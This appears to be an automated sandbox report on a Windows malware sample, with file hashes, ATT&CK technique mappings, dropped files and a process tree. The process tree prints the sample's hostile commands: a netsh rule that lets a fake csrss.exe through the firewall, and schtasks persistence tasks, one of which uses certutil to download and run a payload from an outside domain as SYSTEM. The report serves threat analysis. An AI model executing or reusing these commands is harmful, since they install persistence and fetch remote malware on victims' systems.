654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d

Analysis

max time kernel
37s
max time network
98s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe
Size

3.9MB
MD5

d3b8410f12961fe31e3babc3f3c9cd91
SHA1

fb7af4fba0c0bd68ba59f7656b543737e7069b7a
SHA256

654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d
SHA512

70344439a6585b1f48f7736dcc68621d07cf92f9d663b8578457a2288ab72a2c14dcfa90e657ab38e1ff4d53de01d5380f8f48534384e10273e77015beaec948

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1900 schtasks.exe
1980 schtasks.exe

pid	process
1900	schtasks.exe
1980	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe
"C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe"
1⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe
"C:\Users\Admin\AppData\Local\Temp\654bb155b156016b8d93c02c6eae5252b495ee123de033fa43faf549f04a5a3d.exe"
2⤵
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:1168

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:360

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1836

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1900

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1980

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:336

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524162827.log C:\Windows\Logs\CBS\CbsPersist_20220524162827.cab
1⤵
PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
88KB

MD5
2196863b1584d9f4f5af0b2d8f33ff8c

SHA1
46a0a9f0991124098e6ab10693a2b8aed196e1f3

SHA256
2182159cf3a66b0975508a9d09624f9f1fc989e76a2ee182795d1d23a6f9f2a2

SHA512
de87a7fda6771240847ee4538f854ad8f43f4686483595bb700921a70d20f8b5f6bd1926e711f0c5c7a23fc8f7c525efdf8c3edceaf2f7835ab5e21750c563b9

Download Submit
C:\Windows\rss\csrss.exe
Filesize
186KB

MD5
8fd9f51631cd5133987d50d58d89bf11

SHA1
db55ad9db7edaa9002159d8f68d6bf5d4043b8fb

SHA256
629e25e8d1913fdbe770a37d563c590cc3097eb26851035189061091caaa4732

SHA512
50db57dea1d00f0e38712f42525f29f6c4cd89a783028cddd073d4cb0e02c7e12e6c2f45177a95133ba5ce717095da663350b3f436c99d58d985a08993820d5e

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
107KB

MD5
085412f07d41fad1d4fc61be8692b5e2

SHA1
d028ec99e49a54fb845ddf4df66b15d733449bab

SHA256
a67f61ff62330db3e17f72a43f42f9e6af0f1facf0ffe14b01b8b0e035493fdf

SHA512
6422bd1da0f92c6f84c5312d970c8dc4dcc31f369e6697450fd691bd63c652fce32620c291721fe904e01892f3d3d196a08970cb6816be52d13ceda25bd1aab3

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.1MB

MD5
4badcdb71bf5cf59d4438441cf7b191b

SHA1
f7ab344a5e87740070a6bb0d80a508a110c4b7ac

SHA256
cb48f875437aa21970e82d12ff1972d26278c545cda5757cfd5fa002fad73f47

SHA512
a05452677954753d45113ce631a432f54f2309c5376f4ef09cd3ad0f0dd4af773728ad09591c51970aee38c611f5e3eb135f87b0e7b3797928a22a3b671a222f

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
94KB

MD5
ab52bc07c1cd5ca1026713c16119d91e

SHA1
a7f287e4ef5bb695e436d40f972a32dc99f27c25

SHA256
57097a9f4754d9e6b7199308ec622250017fcfc7062d60b97b6c06f0a6624578

SHA512
25335c7a5691fa188653d16bef68ab00210aea1be06874f05ff37dcef705009b2228ec1b70da2b57e92ea3e6ed80ebfb1aa8993a57fb95661f4828a7d419abf0

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
215KB

MD5
0d9bb709df84d17baa820cb317b3aecb

SHA1
f8bd020bcd097d2ef72f1950e5ea1a653ff94347

SHA256
b0259001d731867eaa39ffd2c5068292651e409e8577c65c9c5f7cb6598c3288

SHA512
b362737036e70e19c920c826c8db930a61ce0904c087ca1d27b090101b686d216e9bbcf36d241995c6e69da16284183d04611186c7d7d9e69ed1758228fc635c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
107KB

MD5
abcc929982e9af7616660e84ba026c93

SHA1
5bf59b79f8afb39e92510756aaf9a4608dd13d21

SHA256
67d00922e3ed5688fe6abcab8ff6c228b4973967b605db6c4362972aa61d6cc1

SHA512
3d2f8320eda7b648256dd1b99cdffb57527ed63172ed7dfc4bb9a35cc4ec1904cef08b628d0ba66775b5c523a39cd0a762b6dc0b26c60c126ac2e5b294b6ad2e

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
178KB

MD5
b09b443d7d83daa657900508c68339bb

SHA1
cc66bbe392f6b5088622d997af60a7027a7f068c

SHA256
0ecb21c79ce87cf7dcba34c36e16312fbe82a3b3c6c756c6797aac6a2e056bfb

SHA512
10d708ab7167f7d36f29be182eb5ecdf232db6ac338371207672082813ef677181694a49349bfaf784706c68eb41b01c684399110247d294903a39b74da22d05

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
124KB

MD5
2c3d271f7ec0d9a5b565529343394fb1

SHA1
104bf98106ae8357ddf0e3323ce2959d57812b9f

SHA256
dbe33d11ef180578a39e6eaa375de4937354f2d415d029add181e8b8e2927acf

SHA512
a85ba10822257d876c799052078ba0ee385b06f310fb767bc750d20da7353f6241c59526139c28e74759affa2eb511bbb5cd6eb8b1c955d2636df6e973b85363

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
147KB

MD5
fc199ed7311dfdd6a21a7c5786380614

SHA1
22c3819cad6aa679f097b39e4611bf28da9d8bc1

SHA256
4be34ccd45a1f118189e9e713f191e9f85e01563f1e97cf8bdb48a206f36d41d

SHA512
c33d8f1ab2919cd2c8bdc417b6878d724026d5c7bddc1004f949c71e4f4110b425eda3a3f8e62704c34df83caf0a0813c62e0d5ad4d1303c8699fba2bf5ed8ff

Download Submit
\Windows\rss\csrss.exe
Filesize
151KB

MD5
a05fb73e11eebaa5e5e6e6938c72b2e7

SHA1
7dbf144193486a48f7b437ca8e9e78272b51aaf7

SHA256
cadaedfc79e71f02b904b0303828d622b5367f2ae5c9ef571ba51086800910a5

SHA512
6ee9a0a8693b5e13c9996c32fb210e46222a6661f09136872a9086463f80e8a722629649f72ca60375b6721a4d93ac6425a00755137de1ccce88e97921660c27

Download Submit
memory/360-63-0x0000000000000000-mapping.dmp

Download
memory/360-64-0x000007FEFB611000-0x000007FEFB613000-memory.dmp

Filesize
8KB

Download
memory/844-60-0x00000000017B0000-0x0000000001EA5000-memory.dmp

Filesize
7.0MB

Download
memory/844-58-0x0000000001400000-0x00000000017A6000-memory.dmp

Filesize
3.6MB

Download
memory/844-62-0x0000000000400000-0x0000000001021000-memory.dmp

Filesize
12.1MB

Download
memory/844-59-0x0000000001400000-0x00000000017A6000-memory.dmp

Filesize
3.6MB

Download
memory/912-57-0x0000000000400000-0x0000000001021000-memory.dmp

Filesize
12.1MB

Download
memory/912-54-0x0000000001410000-0x00000000017B6000-memory.dmp

Filesize
3.6MB

Download
memory/912-56-0x00000000017C0000-0x0000000001EB5000-memory.dmp

Filesize
7.0MB

Download
memory/912-55-0x0000000001410000-0x00000000017B6000-memory.dmp

Filesize
3.6MB

Download
memory/1168-61-0x0000000000000000-mapping.dmp

Download
memory/1836-71-0x0000000000400000-0x0000000001021000-memory.dmp

Filesize
12.1MB

Download
memory/1836-67-0x0000000000000000-mapping.dmp

Download
memory/1836-70-0x00000000012F0000-0x0000000001696000-memory.dmp

Filesize
3.6MB

Download
memory/1836-69-0x00000000012F0000-0x0000000001696000-memory.dmp

Filesize
3.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads